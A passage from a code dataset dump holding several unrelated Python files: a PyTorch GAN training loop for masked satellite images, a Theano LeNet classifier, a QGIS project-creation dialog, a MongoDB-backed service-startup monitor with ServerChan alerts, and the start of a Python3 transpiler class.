generator_loss_BCE[-1],self.config.polyaxon_experiment,epoch)\n modelHelper.saveMetrics(metrics,'D_loss',discriminator_loss[-1],self.config.polyaxon_experiment,epoch)\n modelHelper.saveMetrics(metrics, 'Disc guess on reals', disc_score_reals, self.config.polyaxon_experiment,epoch)\n modelHelper.saveMetrics(metrics, 'Disc guess on fakes', gen_score_fakes, self.config.polyaxon_experiment,\n epoch)\n modelHelper.saveMetrics(metrics, 'Updated disc guess on fakes', gen_score_fakes1, self.config.polyaxon_experiment,\n epoch)\n\n if epoch % self.save_model_step == 0 and self.trainMode == True:\n saveString = 'Epoch Number: ' + str(epoch) + ' Generator loss: ' + str(generator_loss[-1]) + '\\n' + 'Generator loss BCE: ' + str(generator_loss_BCE[-1]) + '\\n' + 'Discriminator loss: ' + str(discriminator_loss[-1]) + '\\n' + 'Disc guess on reals: ' + str(disc_score_reals) + ' Disc guess on fakes: ' + str(gen_score_fakes) + ' Updated disc guess on fakes: ' + str(gen_score_fakes1) + '\\n'\n modelHelper.saveToTxt(filename, saveString)\n name = str(self.modelName) + '_' + str(epoch)\n path_to_model = modelHelper.saveModel(name, self.modelOutputPath, gen, self.modelName)\n modelHelper.save_tensor_batch(real, fake_noise, fake_2, self.batchSize,\n Path.joinpath(self.ImageOutputPath, 'epoch_' + str(epoch)))\n elif epoch % self.save_error_step == 0 and self.trainMode == True:\n saveString = 'Epoch Number: ' + str(epoch) +'\\n' + ' Generator loss: ' + str(\n generator_loss[-1]) + '\\n' + 'Generator loss BCE: ' + str(\n generator_loss_BCE[-1]) + '\\n' + 'Discriminator loss: ' + str(\n discriminator_loss[-1]) + '\\n' + 'Disc guess on reals: ' + str(disc_score_reals) + ' Disc guess on fakes: ' + str(\n gen_score_fakes) + ' Updated disc guess on fakes: ' + str(gen_score_fakes1) + '\\n'\n modelHelper.saveToTxt(filename, saveString)\n return path_to_model\n\n\n# Kommer ikke til at du, da denne training phase, kører på random noise, og ikke på maskerede satelit billeder\n# https://docs.fast.ai/migrating_pytorch\n# device = torch.device(\"cuda:0\" if (torch.cuda.is_available() and numberGPU > 0) else \"cpu\")\n# learner = GANLearner.wgan(self.dataloader, self.generator, self.discriminator, opt_func=Adam, cbs=CudaCallback)\n##Using CudaCallBack if we use normal dataloaders, if we use fastAI, no need for this callback\n# learner.recorder.train_metrics = True #pas, bør returnere metrics for hvordan træningen gik?\n# learner.recorder.valid_metrics = False\n# 
learner.fit(self.epochs, self.lr) #wd? cbs?\n# learner.show_results(max_n=9, ds_idx=0)\n##Outputs\n# learner.predict(self.testImageDataloader) #At whatever index the test images is\n# learner.show_results()\n\n# Training\n# learner.save() Can save model and optimizer state\n# learner.load() load model and optimizer state\n\n def trainTemporalGAN(self):\n gen = self.generator().to(self.device)\n gen_opt = torch.optim.Adam(gen.parameters(), lr=self.lr, betas=(self.beta1, self.beta2))\n disc = self.discriminator().to(self.device)\n disc_opt = torch.optim.Adam(disc.parameters(), lr=self.lr, betas=(self.beta1, self.beta2))\n #display_step = 4\n criterionBCE = nn.BCELoss().cuda()\n criterionMSE = nn.MSELoss().cuda()\n #display_step = 5\n cur_step = 0\n\n discriminator_loss = []\n generator_loss = []\n generator_loss_BCE = []\n\n loadAndAgumentMasks = makeMasks.MaskClass(rand_seed=None)\n\n # måske nn.Conv2d med vægte ikke virker når vi bruger partconv2d, i så fald måske tilføje\n # or isinstance(m,partConv2d) og læg partconv2d et sted hvor den er accessible.\n def weights_init(m):\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.ConvTranspose2d):\n torch.nn.init.normal_(m.weight, 0.0, 0.02)\n if isinstance(m, nn.BatchNorm2d):\n torch.nn.init.normal_(m.weight, 0.0, 0.02)\n torch.nn.init.constant_(m.bias, 0)\n\n gen = gen.apply(weights_init)\n disc = disc.apply(weights_init)\n\n for epoch in range(self.epochs):\n # Dataloader returns the batches\n for temp0,temp1,temp2,temp3,temp4 in tqdm(self.dataloader):\n masks0 = loadAndAgumentMasks.returnTensorMasks(self.batchSize)\n # masksInverted = 1-masks\n # masksInverted = torch.from_numpy(masksInverted)\n # masksInverted = masksInverted.type(torch.cuda.FloatTensor)\n # masksInverted.to(self.device)\n masks0 = torch.from_numpy(masks0)\n masks0 = masks0.type(torch.cuda.FloatTensor)\n masks0 = 1 - masks0\n\n masks1 = loadAndAgumentMasks.returnTensorMasks(self.batchSize)\n masks1 = torch.from_numpy(masks1)\n masks1 = masks1.type(torch.cuda.FloatTensor)\n masks1 = 1 - masks1\n\n masks2 = loadAndAgumentMasks.returnTensorMasks(self.batchSize)\n masks2 = torch.from_numpy(masks2)\n masks2 = masks2.type(torch.cuda.FloatTensor)\n masks2 = 1 - masks2\n\n masks3 = loadAndAgumentMasks.returnTensorMasks(self.batchSize)\n masks3 = torch.from_numpy(masks3)\n masks3 = masks3.type(torch.cuda.FloatTensor)\n masks3 = 1 - masks3\n\n masks4 = loadAndAgumentMasks.returnTensorMasks(self.batchSize)\n masks4 = torch.from_numpy(masks4)\n masks4 = masks4.type(torch.cuda.FloatTensor)\n masks4 = 1 - masks4\n\n masks =torch.cat((masks0,masks1,masks2,masks3,masks4),1).to(self.device)\n real = torch.cat((temp0[0],temp1[0],temp2[0],temp3[0],temp4[0],),1).to(self.device)\n #real = real.to(self.device)\n #t = torch.cuda.get_device_properties(0).total_memory\n #c = torch.cuda.memory_cached(0)\n #a = torch.cuda.memory_allocated(0)\n #print(t)\n #print(c)\n #print(a)\n ## Update discriminator ##\n disc_opt.zero_grad()\n # lav om så den kører på masker\n fake_noise = torch.mul(real, masks)\n fake = gen(fake_noise, masks)\n disc_fake_pred = disc(fake.detach())\n disc_fake_loss = criterionBCE(disc_fake_pred, torch.zeros_like(disc_fake_pred))\n disc_real_pred = disc(real)\n disc_real_loss = criterionBCE(disc_real_pred, torch.ones_like(disc_real_pred))\n disc_loss = (disc_fake_loss + disc_real_loss) / 2\n\n # Keep track of the average discriminator loss\n discriminator_loss.append(disc_loss.item())\n # Update gradients\n disc_loss.backward(retain_graph=True)\n # Update optimizer\n 
disc_opt.step()\n\n ## Update generator ##\n gen_opt.zero_grad()\n # fake_noise_2 = real*masksInverted\n fake_2 = gen(fake_noise, masks)\n disc_fake_pred = disc(fake_2)\n gen_lossMSE = criterionMSE(real, fake_2)\n gen_loss_Adversarial = criterionBCE(disc_fake_pred, torch.ones_like(disc_real_pred))\n gen_loss = gen_lossMSE + gen_loss_Adversarial\n # få lavet en loss function, der penalizer pixels ændret udenfor maske\n # + regner MSE/L1 på alle pixels\n gen_loss.backward()\n gen_opt.step()\n\n # Keep track of the average generator loss\n generator_loss.append(gen_loss.item())\n generator_loss_BCE.append(gen_loss_Adversarial.item())\n\n ## Visualization code ##\n if cur_step % self.save_model_step == 0 and cur_step > 0 and self.trainMode == False:\n\n #if not training, it means we are messing around testing stuff, so no need to save model\n #and losses\n print(\n f\"Step {cur_step}: Generator loss: {gen_loss.item()}, discriminator loss: {disc_loss.item()}\")\n\n # Save loss from generator and discriminator to a file, and reset them, to avoid the list perpetually growing\n # Name of file = model name + batch_size +\n discriminator_loss = [sum(discriminator_loss) / len(discriminator_loss)]\n generator_loss = [sum(generator_loss) / len(generator_loss)]\n generator_loss_BCE = [sum(generator_loss_BCE) / len(generator_loss_BCE)]\n\n self.show_tensor_images(fake_2, real, fake_noise)\n\n #If in train mode, it should not display images at xx display steps, but only save the model and\n #and losses during training\n elif cur_step % self.save_model_step == 0 and cur_step > 0 and self.trainMode == True:\n #save model\n torch.save(gen.state_dict(),\n Path.joinpath(self.modelOutputPath, self.modelName + '_' + str(epoch) + '.pt'))\n\n # Save loss from generator and discriminator to a file, and reset them, to avoid the list perpetually growing\n # Name of file = model name + batch_size +\n discriminator_loss = [sum(discriminator_loss) / len(discriminator_loss)]\n generator_loss = [sum(generator_loss) / len(generator_loss)]\n generator_loss_BCE = [sum(generator_loss_BCE)/len(generator_loss_BCE)]\n self.saveToTxt(generator_loss_BCE, generator_loss_BCE, discriminator_loss)\n\n\n cur_step += 1\n","sub_path":"src/models/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":20753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"241015338","text":"from __future__ import print_function\n\nimport os\nimport sys\nimport timeit\n\nimport numpy\n\nimport math\n\nimport theano\nimport theano.tensor as T\nfrom theano.tensor.signal import downsample\nfrom theano.tensor.nnet import conv2d\n\nfrom logistic_sgd import LogisticRegression, load_data, get_image_size, get_amount_of_classes\nfrom mlp import HiddenLayer\n\n# Initialize and create variables defined by user\n# First, image sizes and amount of classes\n\ndataset = '/Users/Aleksei/Desktop/testing_original'\nimage_x, image_y = get_image_size(dataset)\namount_classes = get_amount_of_classes(dataset)\n\n# Pooling size\npoolsize_x = 2\npoolsize_y = 2\n\n# Learning rate\n# Epochs to be trained and batch size\nuser_learning_rate = 0.0025\nuser_nepochs = 15\nuser_batch = 20\n#\n# # Size of the convolution filter windows\nuser_filter_x = 5\nuser_filter_y = 5\n\n# Treshhold for model training\nuser_treshhold = 0.995\n\nclass LeNetConvPoolLayer(object):\n \"\"\"Pool Layer of a convolutional network \"\"\"\n\n def __init__(self, rng, input, filter_shape, image_shape, poolsize=(poolsize_x, 
poolsize_y)):\n global poolsize_x\n global poolsize_y\n global image_x\n global image_y\n global amount_classes\n global user_learning_rate\n global user_nepochs\n global user_batch\n global user_filter_x\n global user_filter_y\n global user_treshold\n \"\"\"\n Allocate a LeNetConvPoolLayer with shared variable internal parameters.\n \"\"\"\n assert image_shape[1] == filter_shape[1]\n self.input = input\n\n fan_in = numpy.prod(filter_shape[1:])\n\n fan_out = (filter_shape[0] * numpy.prod(filter_shape[2:]) //\n numpy.prod(poolsize))\n\n # initialize weights with random weights\n W_bound = numpy.sqrt(6. / (fan_in + fan_out))\n self.W = theano.shared(\n numpy.asarray(\n rng.uniform(low=-W_bound, high=W_bound, size=filter_shape),\n dtype=theano.config.floatX\n ),\n borrow=True\n )\n\n b_values = numpy.zeros((filter_shape[0],), dtype=theano.config.floatX)\n self.b = theano.shared(value=b_values, borrow=True)\n\n # convolve input feature maps with filters\n conv_out = conv2d(\n input=input,\n filters=self.W,\n filter_shape=filter_shape,\n input_shape=image_shape\n )\n\n # downsample each feature map individually, using maxpooling\n pooled_out = downsample.max_pool_2d(\n input=conv_out,\n ds=poolsize,\n ignore_border=True\n )\n\n #reshape bias to a tensor\n self.output = T.tanh(pooled_out + self.b.dimshuffle('x', 0, 'x', 'x'))\n\n # parameters of the current layer\n self.params = [self.W, self.b]\n\n # model input\n self.input = input\n\n\n\n\n\ndef evaluate_lenet5(learning_rate=user_learning_rate, n_epochs=user_nepochs,\n dataset='/Users/Aleksei/Desktop/testing_original',\n nkerns=[20, 50], batch_size=user_batch):\n \"\"\" Calculates the model. If you want to modify the variables further, they are of the following format:\n learning_rate: float\n n_epochs: int\n dataset: string\n nkerns: list of ints\n \"\"\"\n\n rng = numpy.random.RandomState(23455)\n\n datasets = load_data(dataset)\n\n train_set_x, train_set_y = datasets[0]\n valid_set_x, valid_set_y = datasets[1]\n test_set_x, test_set_y = datasets[2]\n\n # calculate the mini batches number for the three stages\n n_train_batches = train_set_x.get_value(borrow=True).shape[0]\n n_valid_batches = valid_set_x.get_value(borrow=True).shape[0]\n n_test_batches = test_set_x.get_value(borrow=True).shape[0]\n n_train_batches //= batch_size\n n_valid_batches //= batch_size\n n_test_batches //= batch_size\n\n index = T.lscalar()\n\n x = T.matrix('x') # the data is presented as a matrix of RGB of pixels\n y = T.ivector('y') # the labels are presented as 1D vector of integers\n\n ####################\n # BUILD THE MODEL #\n ####################\n print('... 
building the model')\n\n # Reshape the matrix to appropriate size.\n layer0_input = x.reshape((batch_size, 1, image_x, image_y))\n\n # Construct the first convolutional pooling layer\n layer0 = LeNetConvPoolLayer(\n rng,\n input=layer0_input,\n image_shape=(batch_size, 1, image_x, image_y),\n filter_shape=(nkerns[0], 1, user_filter_x, user_filter_y),\n poolsize=(poolsize_x, poolsize_y)\n )\n\n # Construct the further convolutional layers of the amount defined by user\n layer1 = LeNetConvPoolLayer(\n rng,\n input=layer0.output,\n image_shape=(batch_size, nkerns[0], math.floor((image_x - user_filter_x + 1) / poolsize_x),\n math.floor((image_y - user_filter_y + 1) / poolsize_y)),\n filter_shape=(nkerns[1], nkerns[0], user_filter_x, user_filter_y),\n poolsize=(poolsize_x, poolsize_y)\n )\n image_x_1 = math.floor((image_x - user_filter_x + 1) / poolsize_x)\n image_y_1 = math.floor((image_y - user_filter_y + 1) / poolsize_y)\n\n # create the Hidden layer from the output of previous layers\n layer2_input = layer1.output.flatten(2)\n\n # construct a fully-connected sigmoidal layer\n layer2 = HiddenLayer(\n rng,\n input=layer2_input,\n n_in=nkerns[1] * int(math.floor((image_x_1 - user_filter_x + 1) / poolsize_x)) * int(\n math.floor((image_y_1 - user_filter_y + 1) / poolsize_y)),\n n_out=batch_size,\n activation=T.tanh\n )\n\n # classify the values of the fully-connected sigmoidal layer\n layer3 = LogisticRegression(input=layer2.output, n_in=batch_size, n_out=amount_classes)\n\n # the cost evaluates the accuracy of the model\n cost = layer3.negative_log_likelihood(y)\n\n # test and validate the model\n test_model = theano.function(\n [index],\n layer3.errors(y),\n givens={\n x: test_set_x[index * batch_size: (index + 1) * batch_size],\n y: test_set_y[index * batch_size: (index + 1) * batch_size]\n }\n )\n\n validate_model = theano.function(\n [index],\n layer3.errors(y),\n givens={\n x: valid_set_x[index * batch_size: (index + 1) * batch_size],\n y: valid_set_y[index * batch_size: (index + 1) * batch_size]\n }\n )\n\n params = layer3.params + layer2.params + layer1.params + layer0.params\n\n grads = T.grad(cost, params)\n\n updates = [\n (param_i, param_i - learning_rate * grad_i)\n for param_i, grad_i in zip(params, grads)\n ]\n\n train_model = theano.function(\n [index],\n cost,\n updates=updates,\n givens={\n x: train_set_x[index * batch_size: (index + 1) * batch_size],\n y: train_set_y[index * batch_size: (index + 1) * batch_size]\n }\n )\n\n ###############\n # TRAIN MODEL #\n ###############\n print('... 
training')\n patience = 10000\n patience_increase = 2 # time between iterations\n improvement_threshold = user_treshhold # result is considered to be better if improved by this K\n validation_frequency = min(n_train_batches, patience // 2)\n\n best_validation_loss = numpy.inf\n best_iter = 0\n test_score = 0.\n start_time = timeit.default_timer()\n\n epoch = 0\n done_looping = False\n\n while (epoch < n_epochs) and (not done_looping):\n epoch = epoch + 1\n for minibatch_index in range(n_train_batches):\n\n iter = (epoch - 1) * n_train_batches + minibatch_index\n\n if iter % 100 == 0:\n print('training @ iter = ', iter)\n cost_ij = train_model(minibatch_index)\n\n if (iter + 1) % validation_frequency == 0:\n\n # compute zero-one loss on validation set\n validation_losses = [validate_model(i) for i\n in range(n_valid_batches)]\n this_validation_loss = numpy.mean(validation_losses)\n print('epoch %i, minibatch %i/%i, validation error %f %%' %\n (epoch, minibatch_index + 1, n_train_batches,\n this_validation_loss * 100.))\n # test if the current validation score is better than the best. save if it is.\n if this_validation_loss < best_validation_loss:\n\n if this_validation_loss < best_validation_loss * \\\n improvement_threshold:\n patience = max(patience, iter * patience_increase)\n\n best_validation_loss = this_validation_loss\n best_iter = iter\n\n test_losses = [\n test_model(i)\n for i in range(n_test_batches)\n ]\n test_score = numpy.mean(test_losses)\n print((' epoch %i, minibatch %i/%i, test error of '\n 'best model %f %%') %\n (epoch, minibatch_index + 1, n_train_batches,\n test_score * 100.))\n\n if patience <= iter:\n done_looping = True\n break\n\n end_time = timeit.default_timer()\n print('Optimization complete.')\n print('Best validation score of %f %% obtained at iteration %i, '\n 'with test performance %f %%' %\n (best_validation_loss * 100., best_iter + 1, test_score * 100.))\n print(('The code for file ' +\n os.path.split(__file__)[1] +\n ' ran for %.2fm' % ((end_time - start_time) / 60.)), file=sys.stderr)\n\n\nif __name__ == '__main__':\n evaluate_lenet5()\n\n\ndef experiment(state, channel):\n evaluate_lenet5(state.learning_rate, dataset=state.dataset)","sub_path":"convolutional_mlp.py","file_name":"convolutional_mlp.py","file_ext":"py","file_size_in_byte":9802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"204273846","text":"# -*- coding: utf-8 -*-\n\"\"\"\n/***************************************************************************\n CreateProjectDialog\n A QGIS plugin\n Gestion de Plans d'Aménagement Général du Grand-Duché de Luxembourg\n -------------------\n begin : 2015-09-09\n git sha : $Format:%H$\n copyright : (C) 2015 by arx iT\n email : mba@arxit.com\n ***************************************************************************/\n\n/***************************************************************************\n * *\n * This program is free software; you can redistribute it and/or modify *\n * it under the terms of the GNU General Public License as published by *\n * the Free Software Foundation; either version 2 of the License, or *\n * (at your option) any later version. 
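The image_shape arguments threaded through convolutional_mlp.py above follow the usual valid-convolution arithmetic: each LeNetConvPoolLayer maps a side of length n to floor((n - filter + 1) / pool). A worked check with the script's defaults (5x5 filters, 2x2 pooling; the 30x30 input side is illustrative, since the real size comes from get_image_size):

import math

def conv_pool_out(n, filt=5, pool=2):
    # Valid convolution leaves n - filt + 1 positions; max-pooling divides by pool.
    return math.floor((n - filt + 1) / pool)

side0 = 30                     # hypothetical input side length
side1 = conv_pool_out(side0)   # (30 - 5 + 1) // 2 = 13
side2 = conv_pool_out(side1)   # (13 - 5 + 1) // 2 = 4
print(side1, side2)            # 13 4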
*\n * *\n ***************************************************************************/\n\"\"\"\n\nimport os\n\nfrom PyQt4 import QtGui, uic\nfrom PyQt4.QtGui import QFileDialog, QMessageBox\nfrom PyQt4.QtCore import QCoreApplication\n\nimport PagLuxembourg.main\n\nFORM_CLASS, _ = uic.loadUiType(os.path.join(\n os.path.dirname(__file__), 'create_project_dialog.ui'))\n\n\nclass CreateProjectDialog(QtGui.QDialog, FORM_CLASS):\n def __init__(self, parent=None):\n '''\n Constructor.\n '''\n \n super(CreateProjectDialog, self).__init__(parent)\n # Set up the user interface from Designer.\n # After setupUI you can access any designer object by doing\n # self., and you can use autoconnect slots - see\n # http://qt-project.org/doc/qt-4.8/designer-using-a-ui-file.html\n # #widgets-and-dialogs-with-auto-connect\n self.setupUi(self)\n\n def showFolderList(self):\n '''\n Display the project folder selection dialog\n '''\n \n dialog = QFileDialog()\n dialog.setFileMode(QFileDialog.Directory)\n dialog.setOption(QFileDialog.ShowDirsOnly)\n dialog.setWindowTitle(QCoreApplication.translate('CreateProject','Select the new project location'))\n dialog.setSizeGripEnabled(False)\n result = dialog.exec_()\n \n if result == 0:\n return\n \n selected_files = dialog.selectedFiles()\n \n if len(selected_files)==0:\n return\n \n self.txtProjectFolder.setText(selected_files[0])\n \n def clear(self):\n '''\n Clears the text boxes\n '''\n \n self.txtProjectName.setText('')\n self.txtProjectFolder.setText('')\n \n def accept(self):\n '''\n Dialog accept action (OK)\n '''\n \n folder = self.txtProjectFolder.text()\n name = self.txtProjectName.text()\n \n # No project name\n if len(name)==0:\n QMessageBox.critical(self, \n QCoreApplication.translate('CreateProject','Error'),\n QCoreApplication.translate('CreateProject','Please type a project name'))\n \n # Project folder error\n if not os.path.exists(folder):\n QMessageBox.critical(self, \n QCoreApplication.translate('CreateProject','Error'),\n QCoreApplication.translate('CreateProject','The folder does not exist'))\n \n PagLuxembourg.main.current_project.create(folder,name)\n \n self.close()","sub_path":"widgets/create_project/create_project_dialog.py","file_name":"create_project_dialog.py","file_ext":"py","file_size_in_byte":3716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"291160380","text":"import sys\nimport signal\nimport logging.config\nimport time\n\nimport arrow\nimport pymongo\nimport datetime\nimport requests\nimport log4mongo.handlers\n\nfrom .tasks import Task\nfrom .constant import *\n\n__all__ = [\n 'Monitor'\n]\na = 0\n\n\nclass Monitor(object):\n \"\"\"\n\n \"\"\"\n name = 'slavem'\n\n def __init__(self, host='localhost', port=27017, dbn='slavem', username=None, password=None, serverChan=None,\n loggingconf=None):\n \"\"\"\n :param host:\n :param port:\n :param dbn:\n :param username:\n :param password:\n :param serverChan:\n :param loggingconf: logging 的配置 Dict()\n \"\"\"\n\n self.mongoSetting = {\n 'host': host,\n 'port': port,\n 'dbn': dbn,\n 'username': username,\n 'password': password,\n }\n\n self.log = logging.getLogger()\n self.initLog(loggingconf)\n\n # serverChan 的汇报地址\n self.serverChan = serverChan or {}\n if self.serverChan:\n for account, url in self.serverChan.items():\n serverChanUrl = requests.get(url).text\n self.serverChan[account] = serverChanUrl\n else:\n print(u'没有配置 serverChan 的 url')\n\n\n self.mongourl = 
'mongodb://{username}:{password}@{host}:{port}/{dbn}?authMechanism=SCRAM-SHA-1'.format(\n **self.mongoSetting)\n\n self.__active = False\n self._inited = False\n\n # 下次查看是否已经完成任务的时间\n self.nextWatchTime = arrow.now()\n\n # 关闭服务的信号\n for sig in [signal.SIGINT, # 键盘中 Ctrl-C 组合键信号\n signal.SIGHUP, # nohup 守护进程发出的关闭信号\n signal.SIGTERM, # 命令行数据 kill pid 时的信号\n ]:\n signal.signal(sig, self.shutdown)\n\n self.authed = False\n\n def initLog(self, loggingconf):\n \"\"\"\n 初始化日志\n :param loggingconf:\n :return:\n \"\"\"\n if loggingconf:\n # log4mongo 的bug导致使用非admin用户时,建立会报错。\n # 这里使用注入的方式跳过会报错的代码\n log4mongo.handlers._connection = pymongo.MongoClient(\n host=loggingconf['handlers']['mongo']['host'],\n port=loggingconf['handlers']['mongo']['port'],\n )\n\n logging.config.dictConfig(loggingconf)\n self.log = logging.getLogger(self.name)\n\n else:\n self.log = logging.getLogger()\n self.log.setLevel('DEBUG')\n fmt = \"%(asctime)-15s %(levelname)s %(filename)s %(lineno)d %(process)d %(message)s\"\n # datefmt = \"%a-%d-%b %Y %H:%M:%S\"\n datefmt = None\n formatter = logging.Formatter(fmt, datefmt)\n sh = logging.StreamHandler(sys.stdout)\n sh.setFormatter(formatter)\n sh.setLevel('DEBUG')\n self.log.addHandler(sh)\n\n sh = logging.StreamHandler(sys.stderr)\n sh.setFormatter(formatter)\n sh.setLevel('WARN')\n self.log.addHandler(sh)\n self.log.warn(u'未配置 loggingconfig')\n\n @property\n def db(self):\n return self.mongoclient[self.mongoSetting['dbn']]\n\n @property\n def taskCollectionName(self):\n return 'task'\n\n @property\n def reportCollectionName(self):\n return 'report'\n\n def dbConnect(self):\n \"\"\"\n 建立数据库链接\n :return:\n \"\"\"\n try:\n # 检查链接是否正常\n self.mongoclient.server_info()\n except:\n # 重新链接\n self.mongoclient = pymongo.MongoClient(\n host=self.mongoSetting['host'],\n port=self.mongoSetting['port']\n )\n if self.mongoSetting.get('username'):\n # self.mongoclient = pymongo.MongoClient(self.mongourl)\n self.authed = self.db.authenticate(\n self.mongoSetting['username'],\n self.mongoSetting['password']\n )\n\n def init(self):\n \"\"\"\n 初始化服务\n :return:\n \"\"\"\n self._inited = True\n\n # 建立数据库链接\n self.dbConnect()\n\n # 从数据库加载任务\n self.loadTask()\n\n # 对任务进行排序\n self.sortTask()\n\n # 最后更新任务时间\n self.refreshWatchTime()\n\n def _run(self):\n \"\"\"\n\n :return:\n \"\"\"\n # 下次任务时间\n self.reportWatchTime()\n\n while self.__active:\n now = arrow.now()\n if now < self.nextWatchTime:\n time.sleep(1)\n continue\n\n self.log.info(u'达到截止时间')\n\n # 检查任务\n self.checkTask()\n\n # 任务排序\n self.sortTask()\n\n # 最后更新任务时间\n self.refreshWatchTime()\n\n # 下次任务时间\n self.reportWatchTime()\n\n def reportWatchTime(self):\n \"\"\"\n 下次任务的时间\n :return:\n \"\"\"\n now = arrow.now()\n if now < self.nextWatchTime:\n # 还没到观察下一个任务的时间\n rest = self.nextWatchTime - now\n self.log.info(u'下次截止时间 {}'.format(self.nextWatchTime))\n # time.sleep(rest.total_seconds())\n # self.log.info(u'达到截止时间')\n\n def start(self):\n \"\"\"\n\n :return:\n \"\"\"\n self.init()\n\n self.__active = True\n try:\n self._run()\n except Exception as e:\n print(e.message)\n self.log.critical(e.message)\n self.stop()\n\n def stop(self):\n \"\"\"\n 关闭服务\n :return:\n \"\"\"\n self.__active = False\n self.log.info(u'服务即将关闭……')\n\n def shutdown(self, signalnum, frame):\n \"\"\"\n 处理 signal 信号触发的结束服务信号\n :param signalnum:\n :param frame:\n :return:\n \"\"\"\n self.stop()\n\n def __del__(self):\n \"\"\"\n 实例释放时的处理\n :param exc_type:\n :param exc_val:\n :param exc_tb:\n :return:\n \"\"\"\n try:\n if self.authed:\n self.db.logout()\n 
self.mongoclient.close()\n except:\n pass\n\n def loadTask(self):\n \"\"\"\n 加载所有任务\n :return:\n \"\"\"\n # 读取任务\n taskCol = self.db[self.taskCollectionName]\n taskList = []\n for t in taskCol.find():\n if t.get('off'):\n continue\n t.pop('_id')\n taskList.append(Task(**t))\n\n self.tasks = taskList\n self.log.info(u'加载了 {} 个任务'.format(len(self.tasks)))\n if __debug__:\n for t in self.tasks:\n self.log.debug(str(t))\n\n def sortTask(self):\n \"\"\"\n 对任务进行排序\n :return:\n \"\"\"\n self.tasks.sort(key=lambda x: x.deadline)\n\n def refreshWatchTime(self):\n \"\"\"\n\n :return:\n \"\"\"\n try:\n t = self.tasks[0]\n self.nextWatchTime = t.deadline\n except IndexError:\n # 如果没有任务,那么下次检查时间就是1分钟后\n self.nextWatchTime = arrow.now() + datetime.timedelta(seconds=60)\n return\n\n def checkTask(self):\n \"\"\"\n 有任务达到检查时间了,开始检查任务\n :return:\n \"\"\"\n # 获取所有 deadline 时间到的任务实例\n\n taskList = []\n firstLanuchTime = None\n now = arrow.now()\n for t in self.tasks:\n assert isinstance(t, Task)\n if now >= t.deadline:\n taskList.append(t)\n try:\n # 最早开始的一个任务\n if firstLanuchTime < t.lanuchTime:\n firstLanuchTime = t.lanuchTime\n except TypeError:\n firstLanuchTime = t.lanuchTime\n\n self.log.info(u'查询启动报告时间 > {}'.format(firstLanuchTime))\n\n # 查询 >firstLanuchTime 的启动报告\n sql = {\n 'datetime': {\n '$gte': firstLanuchTime,\n }\n }\n\n reportCol = self.db[self.reportCollectionName]\n cursor = reportCol.find(sql)\n\n if __debug__:\n self.log.debug(u'查询到 {} 条报告'.format(cursor.count()))\n\n # 核对启动报告\n for report in cursor:\n for t in taskList:\n assert isinstance(t, Task)\n if t.isReport(report):\n # 完成了,刷新deadline\n self.log.info(u'{} 服务启动完成 {}'.format(t.name, t.lanuchTime))\n if t.isLate:\n # 迟到的启动报告, 也需要发通知\n self.noticeDealyReport(t)\n t.finishAndRefresh()\n taskList.remove(t)\n break\n\n # 未能准时启动的服务\n for t in taskList:\n if t.isTimeToNoticeDelay():\n self.noticeUnreport(t)\n t.refreshLastDelayNoticeTime()\n\n # 设置为启动迟到\n t.setLate()\n # 未完成,将 deadline 延迟到1分钟后\n t.delayDeadline()\n\n def noticeDealyReport(self, task):\n \"\"\"\n\n :param task: tasks.Task\n :param report: dict()\n :return:\n \"\"\"\n # 通知:任务延迟完成了\n text = u'服务{name}启动迟到'.format(name=task.name)\n desp = u'当前时间:{}'.format(arrow.now())\n\n for k, v in task.toNotice().items():\n desp += u'\\n\\n{}\\t:{}'.format(k, v)\n\n self.sendServerChan(text, desp)\n\n def noticeUnreport(self, task):\n \"\"\"\n :param task: tasks.Task\n :return:\n \"\"\"\n # 通知:未收到任务完成通知\n text = u'服务{name}未启动'.format(name=task.name)\n desp = u'当前时间\\t:{}'.format(arrow.now())\n\n for k, v in task.toNotice().items():\n desp += u'\\n\\n{}\\t:{}'.format(k, v)\n\n self.sendServerChan(text, desp)\n\n def sendServerChan(self, text, desp):\n \"\"\"\n\n :return:\n \"\"\"\n for account, serverChanUrl in self.serverChan.items():\n url = serverChanUrl.format(text=text, desp=desp)\n while True:\n r = requests.get(url)\n if r.status_code == 200:\n # 发送异常,重新发送\n break\n self.log.warning(u'向serverChan发送信息异常 code:{}'.format(r.status_code))\n time.sleep(10)\n\n self.log.info(u'向 {} 发送信息 '.format(account))\n\n def createTask(self, **kwargs):\n \"\"\"\n 创建任务\n :param kwargs:\n :return:\n \"\"\"\n newTask = Task(**kwargs)\n\n sql = newTask.toSameTaskKV()\n dic = newTask.toMongoDB()\n\n self.db.task.update_one(sql, {'$set': dic}, upsert=True)\n # self.db.task.find_one_and_update(sql, {'$set': dic}, upsert=True)\n self.log.info(u'创建了task {}'.format(str(dic)))\n\n def showTask(self):\n \"\"\"\n\n :return:\n \"\"\"\n for t in self.tasks:\n 
print(t.toMongoDB())\n","sub_path":"slavem/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":11559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"534680044","text":"from typing import Dict, List, Tuple\nfrom types import MappingProxyType\nfrom collections import OrderedDict\nimport transpilers.OmegaTranspiler as OmegaTranspiler\n\n\nfrom pdb import set_trace\n\n\nclass Python3Transpiler(OmegaTranspiler.OmegaTranspiler):\n\n # TODO: Rewrite to use a method to generate all the strings. In particular, allow for user defined formatting.\n # TODO: Allow for object and static methods\n # TODO: Allow for static variables\n @staticmethod\n def emit_class(class_name: str, class_description: Dict) -> str:\n string_list = [\n \"class {}:\\n\\n\".format(class_name)\n ]\n\n arguments = OrderedDict({\n \"self\": {\n \"static\": False\n }\n })\n\n arguments.update(class_description[\"variables\"])\n\n init_string = Python3Transpiler.emit_function(\"__init__\", arguments, (\" \", []),\n leave_empty=True)\n\n string_list.append(init_string)\n string_list.extend(map(lambda x: \" self.{} = {}\\n\".format(x, x), class_description[\"variables\"]))\n class_string = \"\".join(string_list)\n\n return class_string\n\n @staticmethod\n def emit_function(function_name: str, arguments: Dict,\n language_specific: Tuple[str, List],\n leave_empty: bool=False,\n is_static: bool=False,\n func_format: str=\"default\",\n arg_format: str=\"default\",\n documentation: str= \"\",\n 